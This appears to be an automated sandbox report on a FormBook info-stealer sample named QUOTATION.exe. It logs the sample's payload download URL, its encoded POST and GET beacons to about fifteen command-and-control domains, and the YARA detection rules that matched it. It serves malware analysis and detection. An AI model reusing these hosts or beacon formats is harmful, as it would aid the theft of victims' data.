Source: QUOTATION.exe, 00000008.00000002.4313926438.0000000003418000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.wittofitentertainment.com/VeHZpcMYNF28.binx
Source: explorer.exe, 00000009.00000002.8041134967.00000000157BC000.00000004.80000000.00040000.00000000.sdmp, help.exe, 0000000A.00000002.8005674246.000000000527C000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://zz.bdstatic.com/linksubmit/push.js

Source: unknown

HTTP traffic detected: POST /d91r/ HTTP/1.1Host: www.cardinialethanol.comConnection: closeContent-Length: 184Cache-Control: no-cacheOrigin: http://www.cardinialethanol.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.cardinialethanol.com/d91r/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 70 4f 3d 38 48 4c 51 72 42 73 6a 77 64 65 56 55 5f 33 79 73 58 4f 4f 45 48 79 6b 4c 70 76 52 41 71 75 70 6b 59 33 32 72 75 4e 52 6a 51 42 61 74 61 50 34 46 66 4a 5f 37 36 4a 6c 4f 46 62 59 34 51 6b 36 56 33 68 46 64 54 61 6a 74 4e 38 30 49 78 51 45 59 58 45 6c 54 37 30 76 5a 6f 65 4f 64 51 54 6f 54 6d 6c 58 72 36 53 75 34 69 6e 5a 6c 4b 77 6d 52 35 7a 52 4a 4f 68 79 76 67 6a 79 64 6f 6a 75 78 4b 56 6d 55 5a 57 69 59 70 38 72 4b 49 57 43 51 48 74 64 61 74 50 4d 62 73 28 32 39 72 56 32 44 59 47 69 75 39 51 58 6e 37 50 42 30 77 50 61 57 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: pO=8HLQrBsjwdeVU_3ysXOOEHykLpvRAqupkY32ruNRjQBataP4FfJ_76JlOFbY4Qk6V3hFdTajtN80IxQEYXElT70vZoeOdQToTmlXr6Su4inZlKwmR5zRJOhyvgjydojuxKVmUZWiYp8rKIWCQHtdatPMbs(29rV2DYGiu9QXn7PB0wPaWg).

Source: unknown

DNS traffic detected: queries for: www.wittofitentertainment.com

Source: global traffic	HTTP traffic detected: GET /VeHZpcMYNF28.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.wittofitentertainment.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /d91r/?pO=iC4EpsnjqAMsGvgWFbn+fContgVXGATBB72AUlNsZB8RnX0iaYC7Rjz9cHXMA4a3u8hdEGRv958fgJWC172SOiEaLo/g5aJ7NA==&8H7gL=Bxcfm_qbbEGm HTTP/1.1Host: www.interactive-media.ruConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /d91r/?pO=xFjwo0xAzcGZMdvEtWe8dg3SOJilBZCwp4DaoNJ0mT1+16DKJdlGz7oyHXjYsyYKd34SXU2gi60PXCcIQ24pa/hNG6+rBSLNTw==&8H7gL=Bxcfm_qbbEGm HTTP/1.1Host: www.cardinialethanol.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /d91r/?pO=5uELbA0g21s84RfIYZefn7jmwGm7oIOOLOAnPy0CEmjl7E2osw+P2nrFQVa8XPAXlQFWR1Kf++ZUi1OuENtNpjpnS7NncHgQqw==&8H7gL=Bxcfm_qbbEGm HTTP/1.1Host: www.flaviosilva.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /d91r/?pO=7PV8upFW6FVa3k/MU+30mMAjyxriZ1cDX5oDGeg3AZSuSXraG6qqoVat6TxNWaSRWOEFtjNQc54wQIQLn7Ha+8c9lg+BGW9hdg==&8H7gL=Bxcfm_qbbEGm HTTP/1.1Host: www.solya-shop.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /d91r/?pO=mm2yDWovojsq98EVpVvEejLaRDawKnKNjB2g4hWos3CUrPXkYcC/p+nLjVs5nQU/dkGDVZ/wRxzIeHsnSgbyBomSUgQTl++E/Q==&8H7gL=Bxcfm_qbbEGm HTTP/1.1Host: www.buymyenergy.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /d91r/?pO=QRVitphc0g1OIlGqribmuO+/vkIwz3nmW5e0zmbI+ptVqgaVXv4o34I8PAy9Ptw3AL0LuNtl4GkWhRdrmVn9ER/XiJFNsBOU8g==&8H7gL=Bxcfm_qbbEGm HTTP/1.1Host: www.184411.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /d91r/?pO=A3xSHk+fyI7su/grjjiR7vS7+2q1W7vJyDCiqNYDPcjU2Prp7aaot61k+Logkh61BwiUEQE66B2EoDKGsTYBbPn+5VOUdQAbGQ==&8H7gL=Bxcfm_qbbEGm HTTP/1.1Host: www.b-tek.mediaConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /d91r/?pO=mny6VZKrhd/9NKVuKuT/s/SGWqKgSQU06gLLPmpyieItdUR08ut5ldoEEciwTOIy3aXJmehMaME22hMIN/PsdP4yT3Vly6kaHw==&8H7gL=Bxcfm_qbbEGm HTTP/1.1Host: www.dexmart.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /d91r/?pO=eODNz5pw0nGnv4SFyTaum/5/t7nqNWp+9hyyxvutUEIaFJ9+iSImfL8MjMj4uhwzobeFgf5ptQiqPWHvQt8dHyNKhUrdKKLp8Q==&8H7gL=Bxcfm_qbbEGm HTTP/1.1Host: www.maxhaidt.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /d91r/?pO=9I8nCmGbZhqNwxnuseOoBgVoo3mEoWGWlq2S/FO71IXVKobHlwQLLDq9ejz9WGKrhGOo7OtXutt8bUbRiDDVGcEjYwCLb2KUDQ==&8H7gL=Bxcfm_qbbEGm HTTP/1.1Host: www.ghostdyes.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /d91r/?pO=PMnnsBn+KIOLN/VfOifa/NU1HKCRW97HYgMDorQQf0wo2T3aBqzEKnmyN0lZa7FB9krY/amKEMrac7kP3KvtrQL60DCopbH9IA==&8H7gL=Bxcfm_qbbEGm HTTP/1.1Host: www.aznqmd.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /d91r/?pO=Cz7EdLoZVVVFkl6Al85Fq2yKknQr9MrL8MY+iTrjKvcqeI67VNXHoBdgAYm0xOpsMAVI5pfYswEw4evz8uHbKlZcCugzfDdIKQ==&8H7gL=Bxcfm_qbbEGm HTTP/1.1Host: www.texasgent.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /d91r/?pO=BFqfPYQ6Rc2mbekoZnhhN28rIM4KcYUdKeGPb5qgdPRiCoEueOOZiURhvdwkEmvoJvWE5RZiBCNwm7zhRu2A+WCDMptVnP5c5Q==&8H7gL=Bxcfm_qbbEGm HTTP/1.1Host: www.brightfms.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /d91r/?pO=hOvML0SIJI9mj/fVfRhHepYZOU2m/dN5Na3UVct1YKAZzOLDbZKzqMpLuDmWZppR8Dfu1BJtX3CBTvv/fKLJ92Wtoj7W2JzMDw==&8H7gL=Bxcfm_qbbEGm HTTP/1.1Host: www.eta-trader.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /d91r/?pO=JQY8+24Njt/kPRjDacJftkXMjEMtZDsomMU4C5dHhuIEkrjQwkIyHBDAmNyMXnYjy8/Wz0vFGvMg0maSaemc6vUg0VCqTOU0ug==&8H7gL=Bxcfm_qbbEGm HTTP/1.1Host: www.funvacayflorida.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /d91r/?pO=iC4EpsnjqAMsGvgWFbn+fContgVXGATBB72AUlNsZB8RnX0iaYC7Rjz9cHXMA4a3u8hdEGRv958fgJWC172SOiEaLo/g5aJ7NA==&8H7gL=Bxcfm_qbbEGm HTTP/1.1Host: www.interactive-media.ruConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /d91r/?pO=xFjwo0xAzcGZMdvEtWe8dg3SOJilBZCwp4DaoNJ0mT1+16DKJdlGz7oyHXjYsyYKd34SXU2gi60PXCcIQ24pa/hNG6+rBSLNTw==&8H7gL=Bxcfm_qbbEGm HTTP/1.1Host: www.cardinialethanol.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /d91r/?pO=5uELbA0g21s84RfIYZefn7jmwGm7oIOOLOAnPy0CEmjl7E2osw+P2nrFQVa8XPAXlQFWR1Kf++ZUi1OuENtNpjpnS7NncHgQqw==&8H7gL=Bxcfm_qbbEGm HTTP/1.1Host: www.flaviosilva.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /d91r/?pO=7PV8upFW6FVa3k/MU+30mMAjyxriZ1cDX5oDGeg3AZSuSXraG6qqoVat6TxNWaSRWOEFtjNQc54wQIQLn7Ha+8c9lg+BGW9hdg==&8H7gL=Bxcfm_qbbEGm HTTP/1.1Host: www.solya-shop.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: unknown

HTTPS traffic detected: 162.240.73.101:443 -> 192.168.11.20:49835 version: TLS 1.2

Contains functionality for read data from the clipboard

Source: C:\Users\user\Desktop\QUOTATION.exe

Code function: 2_2_0040523F GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

2_2_0040523F

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 00000008.00000002.4281303153.0000000000060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.7993766326.0000000003200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.7999850935.0000000003760000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.7994581430.0000000003380000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4281579504.0000000000090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Spam, unwanted Advertisements and Ransom Demands

Found potential ransomware demand text

Source: help.exe, 0000000A.00000003.4515135577.0000000008590000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ?unlock@MutexImpl@detail@mozilla@@IEAAXXZ
Source: help.exe, 0000000A.00000003.4515135577.0000000008590000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ??$AddMarker@UTextMarker@markers@baseprofiler@mozilla@@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@baseprofiler@mozilla@@YA?AVProfileBufferBlockIndex@1@AEBV?$ProfilerStringView@D@1@AEBVMarkerCategory@1@$$QEAVMarkerOptions@1@UTextMarker@markers@01@AEBV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z??0PrintfTarget@mozilla@@IEAA@XZ??1MutexImpl@detail@mozilla@@QEAA@XZ??2@YAPEAX_K@Z??3@YAXPEAX@Z??3@YAXPEAX_K@Z??_U@YAPEAX_K@Z??_V@YAXPEAX@Z?BeginProcessRuntimeInit@detail@mscom@mozilla@@YAAEA_NXZ?CleanupProcessRuntime@mozilla@@YAXXZ?CreateAndStorePreXULSkeletonUI@mozilla@@YAXPEAUHINSTANCE__@@HPEAPEAD@Z?DllBlocklist_Initialize@@YAXI@Z?DllBlocklist_SetBasicDllServices@@YAXPEAVDllServicesBase@detail@glue@mozilla@@@Z?DllBlocklist_SetFullDllServices@@YAXPEAVDllServicesBase@detail@glue@mozilla@@@Z?EndProcessRuntimeInit@detail@mscom@mozilla@@YAXXZ?GetProfilingStack@AutoProfilerLabel@baseprofiler@mozilla@@SAPEAVProfilingStack@23@XZ?IsWin32kLockedDown@mozilla@@YA_NXZ?MapRemoteViewOfFile@mozilla@@YAPEAXPEAX0_K01KK@Z?Now@TimeStamp@mozilla@@CA?AV12@_N@Z?NowUnfuzzed@TimeStamp@mozilla@@CA?AV12@_N@Z?PollPreXULSkeletonUIEvents@mozilla@@YAXXZ?WindowsDpiInitialization@mozilla@@YA?AW4WindowsDpiInitializationResult@1@XZ?ensureCapacitySlow@ProfilingStack@baseprofiler@mozilla@@AEAAXXZ?gTwoCharEscapes@detail@mozilla@@3QBDB?lock@MutexImpl@detail@mozilla@@IEAAXXZ?profiler_current_thread_id@baseprofiler@mozilla@@YAHXZ?profiler_init@baseprofiler@mozilla@@YAXPEAX@Z?profiler_shutdown@baseprofiler@mozilla@@YAXXZ?unlock@MutexImpl@detail@mozilla@@IEAAXXZ?vprint@PrintfTarget@mozilla@@QEAA_NPEBDPEAD@Z_wcsdupfreemallocmoz_xmallocmozalloc_abortreallocstrdup
Source: help.exe, 0000000A.00000003.4515135577.0000000008590000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ?_Unlock@?$basic_streambuf@DU?$char_traits@D@std@@@std@@UEAAXXZ
Source: help.exe, 0000000A.00000003.4462698473.0000000007E98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ?unlock@MutexImpl@detail@mozilla@@IEAAXXZ
Source: help.exe, 0000000A.00000003.4462698473.0000000007E98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ??$AddMarker@UTextMarker@markers@baseprofiler@mozilla@@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@baseprofiler@mozilla@@YA?AVProfileBufferBlockIndex@1@AEBV?$ProfilerStringView@D@1@AEBVMarkerCategory@1@$$QEAVMarkerOptions@1@UTextMarker@markers@01@AEBV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z??0PrintfTarget@mozilla@@IEAA@XZ??1MutexImpl@detail@mozilla@@QEAA@XZ??2@YAPEAX_K@Z??3@YAXPEAX@Z??3@YAXPEAX_K@Z??_U@YAPEAX_K@Z??_V@YAXPEAX@Z?BeginProcessRuntimeInit@detail@mscom@mozilla@@YAAEA_NXZ?CleanupProcessRuntime@mozilla@@YAXXZ?CreateAndStorePreXULSkeletonUI@mozilla@@YAXPEAUHINSTANCE__@@HPEAPEAD@Z?DllBlocklist_Initialize@@YAXI@Z?DllBlocklist_SetBasicDllServices@@YAXPEAVDllServicesBase@detail@glue@mozilla@@@Z?DllBlocklist_SetFullDllServices@@YAXPEAVDllServicesBase@detail@glue@mozilla@@@Z?EndProcessRuntimeInit@detail@mscom@mozilla@@YAXXZ?GetProfilingStack@AutoProfilerLabel@baseprofiler@mozilla@@SAPEAVProfilingStack@23@XZ?IsWin32kLockedDown@mozilla@@YA_NXZ?MapRemoteViewOfFile@mozilla@@YAPEAXPEAX0_K01KK@Z?Now@TimeStamp@mozilla@@CA?AV12@_N@Z?NowUnfuzzed@TimeStamp@mozilla@@CA?AV12@_N@Z?PollPreXULSkeletonUIEvents@mozilla@@YAXXZ?WindowsDpiInitialization@mozilla@@YA?AW4WindowsDpiInitializationResult@1@XZ?ensureCapacitySlow@ProfilingStack@baseprofiler@mozilla@@AEAAXXZ?gTwoCharEscapes@detail@mozilla@@3QBDB?lock@MutexImpl@detail@mozilla@@IEAAXXZ?profiler_current_thread_id@baseprofiler@mozilla@@YAHXZ?profiler_init@baseprofiler@mozilla@@YAXPEAX@Z?profiler_shutdown@baseprofiler@mozilla@@YAXXZ?unlock@MutexImpl@detail@mozilla@@IEAAXXZ?vprint@PrintfTarget@mozilla@@QEAA_NPEBDPEAD@Z_wcsdupfreemallocmoz_xmallocmozalloc_abortreallocstrdup
Source: help.exe, 0000000A.00000003.4462698473.0000000007E98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ?_Unlock@?$basic_streambuf@DU?$char_traits@D@std@@@std@@UEAAXXZ

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000008.00000002.4281303153.0000000000060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.4281303153.0000000000060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000A.00000002.7993766326.0000000003200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000002.7993766326.0000000003200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000A.00000002.7999850935.0000000003760000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000002.7999850935.0000000003760000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000A.00000002.7994581430.0000000003380000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000002.7994581430.0000000003380000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000008.00000002.4281579504.0000000000090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.4281579504.0000000000090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: QUOTATION.exe

Uses 32bit PE files

Source: QUOTATION.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Yara signature match

Source: 00000008.00000002.4281303153.0000000000060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.4281303153.0000000000060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000A.00000002.7993766326.0000000003200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000002.7993766326.0000000003200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000A.00000002.7999850935.0000000003760000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000002.7999850935.0000000003760000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000A.00000002.7994581430.0000000003380000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000002.7994581430.0000000003380000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000008.00000002.4281579504.0000000000090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.4281579504.0000000000090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Contains functionality to shutdown / reboot the system

Source: C:\Users\user\Desktop\QUOTATION.exe

Code function: 2_2_00403235 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

2_2_00403235

Detected potential crypto function

Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 2_2_00406666	2_2_00406666
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 2_2_6F601A98	2_2_6F601A98
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 8_2_337EF330	8_2_337EF330
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 8_2_3373E310	8_2_3373E310
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 8_2_33721380	8_2_33721380
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 8_2_337E124C	8_2_337E124C
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 8_2_3371D2EC	8_2_3371D2EC
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 8_2_3377717A	8_2_3377717A
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 8_2_337CD130	8_2_337CD130
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 8_2_3371F113	8_2_3371F113
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 8_2_337F010E	8_2_337F010E
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 8_2_3374B1E0	8_2_3374B1E0
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 8_2_337351C0	8_2_337351C0
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 8_2_337DE076	8_2_337DE076
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 8_2_337E70F1	8_2_337E70F1
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 8_2_3373B0D0	8_2_3373B0D0
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 8_2_337200A0	8_2_337200A0
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 8_2_3376508C	8_2_3376508C
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 8_2_33732760	8_2_33732760
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 8_2_3373A760	8_2_3373A760
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 8_2_337E6757	8_2_337E6757
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 8_2_33754670	8_2_33754670
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 8_2_337DD646	8_2_337DD646
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 8_2_337CD62C	8_2_337CD62C
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 8_2_3374C600	8_2_3374C600
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 8_2_337EF6F6	8_2_337EF6F6
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 8_2_3372C6E0	8_2_3372C6E0
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 8_2_337A36EC	8_2_337A36EC
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 8_2_337EA6C0	8_2_337EA6C0
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 8_2_33730680	8_2_33730680
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 8_2_337FA526	8_2_337FA526
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 8_2_337EF5C9	8_2_337EF5C9
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 8_2_337E75C6	8_2_337E75C6
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 8_2_33730445	8_2_33730445
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 8_2_3379D480	8_2_3379D480
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 8_2_337EFB2E	8_2_337EFB2E
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 8_2_33730B10	8_2_33730B10
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 8_2_3376DB19	8_2_3376DB19
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 8_2_337A4BC0	8_2_337A4BC0
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 8_2_337EEA5B	8_2_337EEA5B
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 8_2_337ECA13	8_2_337ECA13
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 8_2_337EFA89	8_2_337EFA89
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 8_2_337759C0	8_2_337759C0
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 8_2_3372E9A0	8_2_3372E9A0
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 8_2_337EE9A6	8_2_337EE9A6
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 8_2_33739870	8_2_33739870
